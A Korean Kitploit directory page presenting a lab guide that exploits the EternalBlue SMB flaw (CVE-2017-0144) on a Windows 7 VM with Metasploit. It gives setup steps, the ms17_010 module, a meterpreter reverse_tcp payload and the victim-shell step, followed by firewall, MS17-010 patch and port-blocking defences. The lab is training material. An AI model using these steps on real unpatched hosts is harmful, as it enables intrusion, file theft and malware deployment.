Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 — EternalBlue exploit (CVE-2017-0144)을 사용하여 Windows 7 SMB 프로토콜을 대상으로 Metasploit을 활용한 단계별 실습 가이드로, 설정, 익스플로잇 및 완화 단계를 포함합니다. | Kitploit
도구/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
Vulnerability AnalysisExploitationNetwork SecurityPenetration TestingLearning & EducationLabs & Practice
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

EternalBlue exploit (CVE-2017-0144)을 사용하여 Windows 7 SMB 프로토콜을 대상으로 Metasploit을 활용한 단계별 실습 가이드로, 설정, 익스플로잇 및 완화 단계를 포함합니다.

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

LAB: SMB 프로토콜 취약점을 이용한 Windows 운영 체제 공격

  • 1. 설명
  • 2. 개요
  • 3. 준비
  • 4. 공격 실행
  • 5. 방어 방법

1. 설명

이번 실습에서는 두 대의 컴퓨터를 사용하여 Windows 운영 체제의 SMB 프로토콜 취약점을 이용한 공격을 시뮬레이션합니다. 한 대는 Kali Linux 운영 체제를 실행하며 공격자(해커) 역할을 합니다. 그리고 다른 한 대는 피해자(victim) 역할을 합니다. 피해자 컴퓨터는 SMB 취약점이 있는 Windows 7 64비트 운영 체제를 실행 중입니다. 이를 위해 Kali Linux 컴퓨터에서 EternalBlue라는 익스플로잇 코드를 사용하여 Windows 7 컴퓨터를 공격합니다.

2. 개요

Server Message Block(SMB)은 Microsoft Windows 플랫폼에서 매우 널리 사용되는 파일 공유 프로토콜입니다. 이 SMB 프로토콜 덕분에 같은 네트워크 계층이나 같은 도메인 내에서 연결된 Windows 컴퓨터들이 서로 파일을 공유할 수 있습니다. 현재까지 SMB는 Common Internet File Sharing(CIFS)라는 다른 이름으로도 불립니다.

EternalBlue는 포트 445를 통한 SMB 프로토콜의 취약점을 기반으로 하는 정보 익스플로잇 코드입니다. 처음에 EternalBlue는 *미국 국가안보국(NSA)*에 의해 개발되었습니다. 영어 전체 이름은 U.S. National Security Agency입니다. 하지만 이후 2017년 해커 그룹 The Shadow Brokers에 의해 유출되었습니다. 같은 해에 Microsoft Windows를 실행하는 컴퓨터를 대상으로 한 대규모 랜섬웨어 공격이 전 세계적으로 발생했습니다. 그중 가장 유명한 것은 WannaCry 바이러스입니다. 현재까지 이 취약점은 Microsoft가 보안 업데이트 MS17-010을 통해 패치했지만, 전 세계적으로 여전히 이 취약점이 존재하는 Windows 운영 체제를 실행하는 많은 컴퓨터가 있습니다. 이 취약점은 CVE-2017-0144(Windows SMB 원격 코드 실행 취약점)로 공개되었습니다. 이 취약점은 매우 위험하며 쉽게 악용될 수 있습니다. 주목할 점은 이 SMB 프로토콜 취약점을 통해 공격하기 위해 해커가 피해자에게 악성 바이러스를 다운로드하거나 실행하도록 속이거나 보낼 필요가 없다는 것입니다. 즉, 피해자가 아무것도 하지 않더라도 해커가 쉽게 컴퓨터를 장악하여 제어권을 빼앗을 수 있으며, 피해자는 전혀 알지 못합니다.

3. 준비

VMware Workstation 소프트웨어에서 실행할 가상 머신 2대를 준비합니다.

  • Kali Linux 가상 머신(해커 머신) IP 주소: 192.168.198.140
  • Windows 7 가상 머신(피해자 머신) IP 주소: 192.168.198.143
    1. Kali(공격자) 가상 머신에서:

      • IP 확인: ifconfig
      • Postgresql 서비스 시작: service postgresql start
      • postgresql 실행 확인: service postgresql status
    2. Windows 7(피해자) 가상 머신에서:

      • IP 확인: ipconfig
      • 방화벽(Firewall) 비활성화

    4. 공격 실행

    • Kali 머신에서: msfconsole 명령어로 Metasploit에 로그인

    • Metasploit에 접속한 후 search ms17_010 명령어로 ms17_010 관련 취약점 및 구문 검색

    • 피해자 머신 IP, 공격자 머신 IP 추가
    • 페이로드 설정하여 익스플로잇 수행: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

    • 익스플로잇 실행하여 공격 진행
    • 침투 성공 후 피해자 머신에서 셸 열기 (공격자 머신 터미널에서 실행)

    => 여기까지 해커가 피해자 머신에 성공적으로 침투한 것으로 간주됩니다. 이제 해커는 피해자가 전혀 알지 못하는 상태에서 파일을 삭제하거나 훔칠 수 있습니다. 심지어 해커는 그곳에서 직접 바이러스를 업로드하고 실행할 수도 있습니다.

    5. 방어 방법

    SMB 프로토콜이 악용되는 것을 방지하려면 다음 작업을 수행해야 합니다.

    • 방화벽(Firewall) 활성화
    • Windows를 최신 버전으로 업데이트하거나 Microsoft의 보안 패치를 다운로드하여 적용합니다. 특히 ms17_010 보안 패치가 중요합니다.
    • 포트 135, 445 차단
      • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
      • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
    도구 다운로드